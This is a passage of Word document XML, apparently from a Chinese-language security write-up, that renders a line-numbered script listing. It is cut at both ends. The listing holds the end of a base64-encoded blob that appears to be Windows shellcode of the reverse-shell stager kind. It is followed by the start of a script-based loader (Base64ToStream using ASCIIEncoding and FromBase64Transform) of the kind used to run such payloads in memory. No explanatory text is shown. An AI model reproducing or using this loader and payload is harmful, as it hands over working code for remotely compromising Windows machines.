        </w:rPr>
        <w:t>sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Hiej/0LiQAQAAKcRUUGgpgGsA/9VqCmjA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>qAEEaAIAADWJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ar/Tgh17OhnAAAAagBqBFZXaALZyF//1Y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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>P4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BqAFBoCy8PMP/VV2h1bk1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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>h/9VeXv8MJA+FcP///+mb////AcMpxnXB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>w7vwtaJWagBT/9U="</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="359" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="10079" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="8" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>End</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SetVersion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>End</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Base64ToStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>enc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8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enc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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CreateObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"System.Text.ASCIIEncoding"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t>  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length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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996c38"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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enc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.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GetByteCount_2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(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b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7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transform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CreateObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"System.Security.Cryptography.FromBase64Transform"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
